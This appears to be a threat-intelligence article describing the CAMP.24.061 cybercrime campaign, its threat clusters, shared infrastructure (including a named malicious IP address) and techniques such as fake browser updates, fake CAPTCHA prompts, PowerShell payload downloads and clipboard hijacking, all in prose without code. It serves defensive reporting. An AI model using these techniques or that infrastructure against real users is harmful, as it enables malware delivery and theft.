Unraveling the CAMP.24.061 Cybercrime Web: A Deep Dive into…

In the ever-evolving landscape of cybersecurity, web browsers have emerged as a prime target for cybercriminals. The recent “CAMP.24.061” campaign, a sophisticated and financially motivated cybercrime operation, exemplifies this growing trend. This article delves into the intricacies of this campaign, its tactics, techniques, and procedures (TTPs), and the broader implications for cybersecurity.

Understanding the CAMP.24.061 Campaign

The “CAMP.24.061” campaign, initially reported by Mandiant and further analyzed by the Menlo Threat Intelligence team, is a complex web of interconnected cybercriminal activities. It involves multiple threat clusters—UNC1543, UNC2926, UNC5142, UNC5518, and UNC4108—all leveraging drive-by downloads and fake browser updates to distribute a wide array of malware payloads.

The Ubiquity of Web Browsers

Web browsers are the gateway to the internet, and their ubiquity makes them an attractive target for cybercriminals. They are used by billions of people worldwide, and their widespread use means that any vulnerability can be exploited on a massive scale. This is why cybercriminals are increasingly focusing on browser-based attacks.

The Financially Motivated Threat Clusters

The threat clusters involved in the “CAMP.24.061” campaign are all financially motivated. This means that their primary goal is to make money, whether through ransomware, ad fraud, or other means. The shared methodologies and overlapping infrastructure underscore a complex, interconnected ecosystem of financially motivated cybercrime.

Infrastructure Overlap and Interconnectedness

One of the key findings of the Menlo Threat Intelligence team is the infrastructure overlap between the various threat clusters involved in the “CAMP.24.061” campaign. This interconnectedness is a clear indication of a complex, coordinated cybercrime operation.

UNC5518 and UNC4108

During threat hunting activities, Menlo identified an infrastructure overlap between UNC5518 and UNC4108 due to their shared use of the IP address 162.33.178.132. This overlap suggests that the two threat clusters are interconnected, either through a shared malicious TDS (Trojan Downloader System) or through direct collaboration.

CAMP.24.061 and CAMP.24.079

The “CAMP.24.061” campaign also has overlap with “CAMP.24.079”. In this campaign, UNC4108 is using a malicious TDS system (Recorded Future tracks as TAG-124), and employing EtherHiding and CLICKFIX with the same code we observed UNC5518 using. This further underscores the interconnectedness of these cybercrime operations.

Infection Chains and TTPs

The Menlo Threat Intelligence team has been able to observe the IOCs (Indicators of Compromise) associated with the “CAMP.24.061” campaign and has constructed infection chains and analysis on items seen in the wild. This section delves into the infection chains observed and the TTPs used by the threat clusters involved.

UNC5518 and UNC4108

Mandiant observed the following infection chain(s) in use by UNC5518 (Feb. 8–14, 2025), which is similar to what Menlo observed. This infection chain involves the use of malicious scripts to fingerprint the victim, execute malicious PowerShell commands, mimic CAPTCHA behavior, and hijack the clipboard.

Deep Dive: Malicious Scripts

The malicious scripts used in the “CAMP.24.061” campaign are highly obfuscated and multi-stage. They include fingerprinting, command execution (PowerShell), fake CAPTCHA behavior, and clipboard hijacking. This section provides a deep dive into the key components of these scripts.

Fingerprinting and Data Collection

The malicious scripts used in the “CAMP.24.061” campaign are designed to fingerprint the victim and collect data. This data is then sent to the cybercriminals’ command-and-control (C2) servers. The scripts use various techniques to evade detection and make it difficult for security tools to analyze them.

Malicious PowerShell Execution

One of the key components of the malicious scripts is the execution of malicious PowerShell commands. These commands are used to download and run remote payloads, which are then used to further compromise the victim’s system. The scripts use various obfuscation techniques to make it difficult for security tools to detect and analyze these commands.

Fake CAPTCHA Behavior

The malicious scripts used in the “CAMP.24.061” campaign are designed to mimic CAPTCHA behavior. This is done to trick the user into interacting with the script, which can then be used to further compromise the victim’s system. The scripts use various obfuscation techniques to make it difficult for security tools to detect and analyze this behavior.

Clipboard Hijacking

Another key component of the malicious scripts is clipboard hijacking. This is done to steal sensitive data from the victim’s system. The scripts use various obfuscation techniques to make it difficult for security tools to detect and analyze this behavior.

HTML and CSS Obfuscation

The malicious scripts used in the “CAMP.24.061” campaign also use HTML and CSS obfuscation to hide malicious UI elements and evade detection by security tools and content filters. This makes it difficult for security tools to detect and analyze the scripts.

Broader Implications for Cybersecurity

The “CAMP.24.061” campaign highlights the growing threat posed by browser-based cybercrime. This campaign is just one example of the many sophisticated and financially motivated cybercrime operations targeting web browsers. The interconnectedness of these operations underscores the need for robust browser security measures and proactive threat intelligence.

The Need for Robust Browser Security Measures

The “CAMP.24.061” campaign highlights the need for robust browser security measures. This includes the use of advanced threat detection and prevention technologies, as well as proactive threat intelligence to stay ahead of emerging threats.

The Importance of Proactive Threat Intelligence

Proactive threat intelligence is essential for defenders in the face of evolving cyber threats. The “CAMP.24.061” campaign is a clear example of the need for organizations to stay informed about emerging threats and to adapt their security measures accordingly.

Conclusion

The “CAMP.24.061” campaign is a complex and sophisticated cybercrime operation targeting web browsers. The interconnectedness of the various threat clusters involved underscores the need for robust browser security measures and proactive threat intelligence. As cybercriminals continue to evolve their tactics and techniques, it is more important than ever for organizations to stay informed and adapt their security measures accordingly.

FAQ

What is the “CAMP.24.061” campaign?

The “CAMP.24.061” campaign is a complex and sophisticated cybercrime operation targeting web browsers. It involves multiple threat clusters—UNC1543, UNC2926, UNC5142, UNC5518, and UNC4108—all leveraging drive-by downloads and fake browser updates to distribute a wide array of malware payloads.

What are the key findings of the Menlo Threat Intelligence team?

The key findings of the Menlo Threat Intelligence team include the infrastructure overlap between the various threat clusters involved in the “CAMP.24.061” campaign and the interconnectedness of these cybercrime operations. This underscores the need for robust browser security measures and proactive threat intelligence.

What are the TTPs used by the threat clusters involved in the “CAMP.24.061” campaign?

The TTPs used by the threat clusters involved in the “CAMP.24.061” campaign include drive-by downloads, fake browser updates, malicious scripts, fingerprinting, command execution (PowerShell), fake CAPTCHA behavior, and clipboard hijacking.

What are the broader implications of the “CAMP.24.061” campaign for cybersecurity?

The “CAMP.24.061” campaign highlights the growing threat posed by browser-based cybercrime. It underscores the need for robust browser security measures and proactive threat intelligence to stay ahead of emerging threats.

What can organizations do to protect themselves against browser-based cybercrime?

Organizations can protect themselves against browser-based cybercrime by using advanced threat detection and prevention technologies, staying informed about emerging threats through proactive threat intelligence, and adapting their security measures accordingly.